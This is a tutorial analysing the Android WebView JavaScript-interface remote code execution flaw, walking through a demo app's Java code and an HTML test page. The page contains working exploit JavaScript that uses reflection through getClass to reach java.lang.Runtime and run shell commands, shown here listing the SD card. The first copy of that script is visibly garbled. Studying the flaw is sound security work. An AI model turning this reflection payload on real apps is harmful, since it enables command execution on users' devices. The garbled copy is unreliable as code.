Android WebView Remote Code Execution Vulnerability Analysis

Android WebView Remote Code Execution Vulnerability Analysis

0x00

This document describes the remote code execution vulnerability in Android WebView. The Code address is https://github.com/jltxgcy/appvulnerability/tree/master/webviewfiledemo. Next we will analyze the code.

 

0x01

First, list the project directories:

The MainActivity. java code is as follows:

 

public class MainActivity extends Activity {private WebView webView;private Uri mUri;private String url;//String mUrl1 = "file:///android_asset/html/attack_file.html";String mUrl2 = "file:///android_asset/html/test.html";@Overrideprotected void onCreate(Bundle savedInstanceState) {super.onCreate(savedInstanceState);setContentView(R.layout.activity_main);webView = (WebView) findViewById(R.id.webview);webView.getSettings().setJavaScriptEnabled(true);webView.addJavascriptInterface(new JSInterface(), "jsInterface");//webView.getSettings().setAllowFileAccessFromFileURLs(true);webView.setWebChromeClient(new WebChromeClient() {@Override    public boolean onJsAlert(WebView view, String url, String message,JsResult result) {    //Required functionality here    return super.onJsAlert(view, url, message, result);}});webView.loadUrl(mUrl2);}    class JSInterface {        public String onButtonClick(String text) {            final String str = text;            runOnUiThread(new Runnable() {                @Override                public void run() {                    Log.e("leehong2", "onButtonClick: text = " + str);                    Toast.makeText(getApplicationContext(), "onButtonClick: text = " + str, Toast.LENGTH_LONG).show();                }            });                        return "This text is returned from Java layer.  js text = " + text;        }                public void onImageClick(String url, int width, int height) {            final String str = "onImageClick: text = " + url + "  width = " + width + "  height = " + height;            Log.i("leehong2", str);            runOnUiThread(new Runnable() {                @Override                public void run() {                    Toast.makeText(getApplicationContext(), str, Toast.LENGTH_LONG).show();                }            });        }    }}

The following code sets up that the html loaded by webView can interact with java code through javaScript.

 

 

webView.getSettings().setJavaScriptEnabled(true);webView.addJavascriptInterface(new JSInterface(), "jsInterface");

 

 

Let's take a look at the loaded html file, which is located in the aessets directory.

webView.loadUrl(mUrl2);

 

Test.html:

 

<Script> var I = 0; function getContents (inputStream) {var contents = "" + I; var B = inputStream. read (); var I = 1; while (B! =-1) {var bString = String. fromCharCode (B); contents + = bString; contents + = "\ n" B = inputStream. read ();} I = I + 1; return contents;} function execute (cmdArgs) {for (var obj in window) {console. log (window [obj]); if ("getClass" in window [obj]) {alert (obj); return window [obj]. getClass (). forName ("java. lang. runtime "). getMethod ("getRuntime", null0000.invoke(null,null0000.exe c (cmdArgs) ;}} var p = execu Te (["ls", "/mnt/sdcard/"]); document. write (getContents (p. getInputStream (); </script> <script language = "javascript"> function onButtonClick () {// Call the method of injected object from Android source. var text = jsInterface. onButtonClick ("text transferred from JS !!! "); Alert (text);} function onImageClick () {// Call the method of injected object from Android source. var src = document. getElementById ("image "). src; var width = document. getElementById ("image "). width; var height = document. getElementById ("image "). height; // Call the method of injected object from Android source. jsInterface. onImageClick (src, width, height) ;}</script>

Click the image to upload the URL to the Java code

 

Interaction with Java codeFor more information about html and javaScript, see http://www.w3school.com.cn/html/html_getstarted.asp.

 

The main cause of the vulnerability is the following code:

 

function execute(cmdArgs)       {        for (var obj in window) {            console.log(window[obj]);            if ("getClass" in window[obj]) {                alert(obj);                return window[obj].getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);             }         }       }             var p = execute(["ls","/mnt/sdcard/"]);

Attackers can find the object with the "getClass" method, obtain the Java Runtime object through the reflection mechanism, and then call the static method to execute system commands. This causes harm.

 

For detailed functions of this program, please download the code and run it yourself.